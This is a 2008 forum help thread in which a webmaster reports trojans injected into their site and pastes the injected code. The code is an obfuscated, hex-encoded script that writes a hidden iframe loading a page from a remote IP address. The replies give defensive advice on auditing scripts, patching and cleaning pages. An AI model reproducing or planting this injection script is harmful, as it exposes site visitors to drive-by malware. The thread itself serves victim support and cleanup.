Author Topic: TROJAN TROJAN TROJAN  (Read 8460 times)

0 Members and 1 Guest are viewing this topic.

July 04, 2008, 05:42:16 pm
Read 8460 times

deepakbansal

  • Newbie

  • Offline
  • *

  • 1
Hi

Following Trojans are getting entered into my site whenever I connect remote server through WS FTP.

•   JS/Downloader.small
•   Downloader.PI
•   Trojan –Downloader.win32.Axload.j
•   Trojan-clicler.JS.Agent.h
•   Trojan-Clicker.HTML.IFrame.ru
•   Trojan-Downloder.Win32.Axload.j
•   Trojan-Downloader.HTML.IFrame.ds
•   Trojan-Clicker.HTML.IFrame.jb
•   Trojan-Clicker.JS.Agent.h

A code something like below gets automatically entered:

Code: [Select]
<script> <!-- var d=document,kol=561; function O10H48605858679A4(H486058586819D){ var H48605858689AD = 16; return( parseInt(H486058586819D,H48605858689AD));}function H486058586999B(H486058586A193){ var H486058586B976 = 2; var H486058586A98B='';for(H486058586B187=0; H486058586B187<H486058586A193.length; H486058586B187+=H486058586B976){ H486058586A98B += ( String.fromCharCode (O10H48605858679A4(H486058586A193.substr(H486058586B187, H486058586B976))));}return H486058586A98B;} document.write(H486058586999B('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A31333634292B273632615C272077696474683D333431206865696768743D34207374796C653D5C27646973706C61793A206E6F6E655C273E
3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E')); //--> </script>
 

No antivirus can detect any problem in my system. When Trojan gets entered into index.htm page of site, and anyone open the site, antivirus then shows that there is virus present in site.

So I want to solve this problem permanently. I want to delete this Trojan from root level in my system. I have tried almost all antivirus/anti-spywares , and no one is able to detect it at root level. They only detect when Trojan infects the site.



July 04, 2008, 07:35:12 pm
Reply #1

sowhat-x

  • Guest
Question:After say manually cleaning the main index.htm from the 'infected" js code,
have you tried connecting with an alternative client,ie.FileZilla/whatever?
What happens in such case?

July 04, 2008, 08:06:59 pm
Reply #2

sowhat-x

  • Guest
I'm asking you to test the above,
because I really doubt that the WS_FTP client executable is causing the problem...
ie.that it got infected or something similar itself.
Check ALL of the scripts that are located in your server there,
as I bet that one of them is what's causing the trouble...
And when I say all 'scripts',I also mean you should audit your php/sql code as well...

Have a look at the following thread...where a somewhat similar problem had arised,
might give you a few ideas further on what kind of stuff you should be looking for:
http://www.malwaredomainlist.com/forums/index.php?topic=1867.msg3748#msg3748

July 06, 2008, 09:44:30 am
Reply #3

CM_MWR

  • Special Members
  • Hero Member

  • Offline
  • *

  • 319
That script can really only be inserted by someone with admin access,check any ftps and look for sql patches for your system.

This one too is often inserted into asp pages as well.

In short,you appear to be compromised on the equivelant of root access,so sounds like you have some patching,updating to do as well as searching all directories\pages for this code then cleaning each instance.